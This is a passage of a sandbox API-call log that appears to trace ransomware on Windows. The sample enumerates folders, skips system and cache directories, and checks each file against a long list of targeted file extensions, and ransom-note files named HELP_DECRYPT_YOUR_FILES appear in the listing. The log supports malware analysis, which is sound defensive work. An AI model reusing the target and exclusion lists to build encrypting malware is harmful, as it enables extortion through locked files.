	[0167.669] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.669] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.669] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="webcache") returned 0x0
	[0167.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="inetcache") returned 0x0
	[0167.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="nvidia") returned 0x0
	[0167.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.670] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="packages") returned 0x0
	[0167.670] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="cookies") returned 0x0
	[0167.671] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.671] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\*.*", lpSrch="programdata") returned 0x0
	[0167.671] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.671] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.671] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d725924, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.671] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.671] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d725924, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d725924, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d771ee4, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.693] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d6ffb4b, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d6ffb4b, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d725924, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.693] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", cAlternateFileName="{07DEB~1")) returned 1
	[0167.693] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="..") returned 1
	[0167.693] lstrcmpW (lpString1="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2=".") returned 1
	[0167.693] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task"
	[0167.693] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\"
	[0167.694] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\", lpString2="{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}"
	[0167.694] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}"
	[0167.694] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.694] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.694] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*"
	[0167.694] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0167.704] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 89
	[0167.704] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.704] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", cchLength=0x59 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*") returned 0x59
	[0167.704] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="windows") returned 0x0
	[0167.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="boot") returned 0x0
	[0167.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="system volume information") returned 0x0
	[0167.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.705] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="temp") returned 0x0
	[0167.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="program files") returned 0x0
	[0167.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.706] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="appdata") returned 0x0
	[0167.706] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="application data") returned 0x0
	[0167.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="winnt") returned 0x0
	[0167.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="tmp") returned 0x0
	[0167.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.707] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="cache") returned 0x0
	[0167.707] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="webcache") returned 0x0
	[0167.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="inetcache") returned 0x0
	[0167.708] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.708] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="nvidia") returned 0x0
	[0167.709] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.709] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="packages") returned 0x0
	[0167.709] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.709] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="cookies") returned 0x0
	[0167.709] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.709] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\*.*", lpSrch="programdata") returned 0x0
	[0167.709] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.710] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0167.710] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1
	[0167.710] lstrcmpW (lpString1="folder.ico", lpString2="..") returned 1
	[0167.710] lstrcmpW (lpString1="folder.ico", lpString2=".") returned 1
	[0167.710] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.710] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="folder.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"
	[0167.710] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96
	[0167.710] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.711] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", cchLength=0x60 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 0x60
	[0167.711] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.711] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.711] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico"
	[0167.711] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\folder.ico") returned 96
	[0167.711] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.712] StrStrW (lpFirst=".ico", lpSrch=".") returned=".ico"
	[0167.712] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.712] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ico") returned 0x0
	[0167.712] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5026e6f8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5026e6f8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5026e6f8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="netfol.ico", cAlternateFileName="")) returned 1
	[0167.713] lstrcmpW (lpString1="netfol.ico", lpString2="..") returned 1
	[0167.713] lstrcmpW (lpString1="netfol.ico", lpString2=".") returned 1
	[0167.713] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.713] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="netfol.ico" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"
	[0167.713] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico") returned 96
	[0167.713] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
